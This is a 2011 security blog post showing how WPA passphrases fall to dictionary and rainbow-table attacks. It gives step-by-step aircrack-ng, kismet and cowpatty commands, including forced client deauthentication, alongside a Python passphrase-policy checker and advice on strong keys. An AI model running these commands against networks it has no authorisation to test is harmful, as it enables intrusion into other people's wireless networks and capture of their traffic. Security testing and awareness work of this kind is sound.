Hacking the WPA Airwaves

Monday, May 16, 2011

Mark Bennett


It is interesting how many people believe that their wireless is secure because they are using WPA.

Well, we did a test recently and were able to guess the passphrase with a dictionary attack, using either a straight wordlist or a rainbow table.

The cool thing is that I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a readable phrase with digits swapped in for letters like op3nth3p0dbayd00rs; the tables of today are too intelligent for that.
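As an added illustration (not part of the original post), here is a hypothetical passphrase-policy check in Python that rejects the kind of PSK the advice above warns about: it undoes common digit-for-letter substitutions, tests whether the result splits entirely into wordlist entries, and refuses a passphrase that contains the SSID. The mini wordlist and helper names are constructed for this example.

```python
import re

# Constructed mini wordlist; a real check would load a large list,
# the same kind of list a dictionary-attack tool would be fed.
WORDLIST = {"open", "the", "pod", "bay", "doors", "password", "dynamite",
            "dlink", "wireless", "hal", "letmein"}

# Common "leet" substitutions that cracking rule sets undo automatically.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})

def normalize(passphrase: str) -> str:
    """Lower-case, undo leet substitutions, then keep letters only."""
    return re.sub(r"[^a-z]", "", passphrase.lower().translate(LEET))

def letters_only(passphrase: str) -> str:
    """Lower-case and drop digits/symbols without any leet mapping."""
    return re.sub(r"[^a-z]", "", passphrase.lower())

def segments_into_words(text: str, words: set, max_len: int = 12) -> bool:
    """True if text splits entirely into wordlist entries (dynamic programming)."""
    if not text:
        return False
    ok = [True] + [False] * len(text)
    for i in range(1, len(text) + 1):
        for j in range(max(0, i - max_len), i):
            if ok[j] and text[j:i] in words:
                ok[i] = True
                break
    return ok[len(text)]

def check_psk(passphrase: str, ssid: str, words: set = WORDLIST) -> list:
    """Return a list of policy violations; an empty list means acceptable."""
    problems = []
    if not 8 <= len(passphrase) <= 63:            # WPA-PSK passphrase length range
        problems.append("length must be 8-63 characters")
    if ssid.lower() in passphrase.lower():
        problems.append("contains the SSID")
    for variant in (normalize(passphrase), letters_only(passphrase)):
        if segments_into_words(variant, words):
            problems.append("normalises to dictionary words: %s" % variant)
            break
    if len(set(passphrase)) < 8:
        problems.append("too few distinct characters")
    return problems

if __name__ == "__main__":
    for pw in ("op3nth3p0dbayd00rs", "dynamite", "Password2011!", "xK9#vQ2m$Lp7&zR4"):
        print(pw, "->", check_psk(pw, "dynamite") or "ok")
```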

In a nutshell, using Linux, this is how it is done:

Part I

airmon-ng start wlan0   (this puts the wireless card in promiscuous mode)

kismet -c wlan0

  • close the console window to see the collection of packets
  • use alt + k to get to the top pull-down menus; turn on the ability to see the access point type, BSSID, a guess at the IP address, and the channel number

Ctrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c <channel> --bssid <BSSID> -w <file prefix> wlan0


airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0   * Note: D-Link-01.cap is where the capture of all traffic will go

Now open another window, as we need to force a reconnect from the target (see the Note below).

aireplay-ng -0 <count> -a <BSSID> -c <client MAC> wlan0


aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see a WPA re-key (the handshake) at the top of the airodump window. Capture some traffic and exit; you will then have all the captured traffic in the D-Link-01.cap file.

Part III

Download either rainbow tables or a direct dictionary from Offensive Security: offensive-security.com/wpa-tables

If using hashes (rainbow tables):

cowpatty -r <capture.cap> -d <hash file> -s <SSID>


cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using dictionary words:

cowpatty -r <capture.cap> -f <wordlist> -s <SSID>


cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note: If you are in an environment with a lot of cell phones such as the iPhone (and they are using their wireless to connect to the network), we found these all go to sleep when their screen is turned off, and their wireless card wakes up again when the screen is activated.

So you don't need to send a de-auth at all; all you have to do is hang around long enough for someone to touch their iPhone or other cell phone, have it wake up its wireless and re-authenticate to the network. In other words, there is the weakest link! LOL!

Happy Cracking...

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Jan Popovic: Hi Mark,

Thanks for sharing this.

Can you please suggest how long it took you to break the WPA PSK, and what would therefore be your recommendation for the frequency of the automated key changes in WPA Enterprise mode?

Jan Popovic